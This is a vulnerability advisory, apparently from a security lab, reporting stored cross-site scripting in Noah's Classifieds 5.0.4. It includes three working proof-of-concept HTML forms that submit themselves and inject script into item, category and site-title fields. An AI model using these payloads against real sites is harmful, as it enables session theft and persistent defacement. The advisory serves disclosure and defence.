Vulnerability ID: HTB22952
Reference: http://www.htbridge.ch/advisory/xss_vulnerabilities_in_noah_s_classifieds.html
Product: Noah's Classifieds
Vendor: Noah's Classifieds ( http://www.noahsclassifieds.org/ ) 
Vulnerable Version: 5.0.4 and probably prior versions
Vendor Notification: 12 April 2011 
Vulnerability Type: Stored XSS (Cross Site Scripting)
Risk level: Medium 
Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) 

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "index.php" script to properly sanitize user-supplied input in "col_18", "description" variables. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:
1.

<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="list" value="item">
<input type="hidden" name="method" value="create">
<input type="hidden" name="rollid" value="2">
<input type="hidden" name="id" value="0">
<input type="hidden" name="cid" value="2">
<input type="hidden" name="col_16"  value="">
<input type="hidden" name="col_17" value='title"><script>alert(document.cookie)</script>'>
<input type="hidden" name="col_18" value='<p>description of my"&gt;</p>
<script type="text/javascript">// <![CDATA[
alert(document.cookie)
// ]]></script>'>
<input type="hidden" name="col_19" value="Pc">
<input type="hidden" name="col_20" value="">
<input type="hidden" name="gsubmit" value="Ok">
</form>
<script>
document.main.submit();
</script>


2.

<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="list" value="appcategory">
<input type="hidden" name="method" value="modify">
<input type="hidden" name="rollid" value="5">
<input type="hidden" name="id" value="5">
<input type="hidden" name="up" value="1">
<input type="hidden" name="wholeName" value="catitem">
<input type="hidden" name="name" value="catitem">
<input type="hidden" name="description" value='cat2"><script>alert(document.cookie)</script>'>
<input type="hidden" name="picture" value="">
<input type="hidden" name="descriptionMeta" value="">
<input type="hidden" name="keywords" value="">
<input type="hidden" name="customAdMeta" value="">
<input type="hidden" name="allowAd" value="1">
<input type="hidden" name="immediateAppear" value="1">
<input type="hidden" name="inactivateOnModify" value="1">
<input type="hidden" name="displayResponseLink" value="1">
<input type="hidden" name="displayFriendmailLink" value="1">
<input type="hidden" name="displayFlaggedLink" value="1">
<input type="hidden" name="customAdListTitle" value="">
<input type="hidden" name="customAdListTemplate" value="">
<input type="hidden" name="customAdDetailsTemplate" value="">
<input type="hidden" name="gsubmit" value="Ok">
</form>
<script>
document.main.submit();
</script>


3.

<form action="http://host/index.php" method="post" name="main" enctype="multipart/form-data">
<input type="hidden" name="list" value="appsettings">
<input type="hidden" name="method" value="modify">
<input type="hidden" name="rollid" value="1">
<input type="hidden" name="id" value="1">
<input type="hidden" name="defaultTheme" value="modern">
<input type="hidden" name="defaultLanguage" value="en">
<input type="hidden" name="langDir" value="ltr">
<input type="hidden" name="adminEmail" value="">
<input type="hidden" name="titlePrefix" value='[Noahs Classifieds]</title><script>alert(document.cookie)</script>'>
<input type="hidden" name="mainTitle" value="">
<input type="hidden" name="charLimit" value="0">
<input type="hidden" name="blockSize" value="20">
<input type="hidden" name="dateFormat" value="Y-m-d">
<input type="hidden" name="timeFormat" value="Y-m-d H:i">
<input type="hidden" name="gsubmit" value="Ok">

</form>
<script>
document.main.submit();
</script>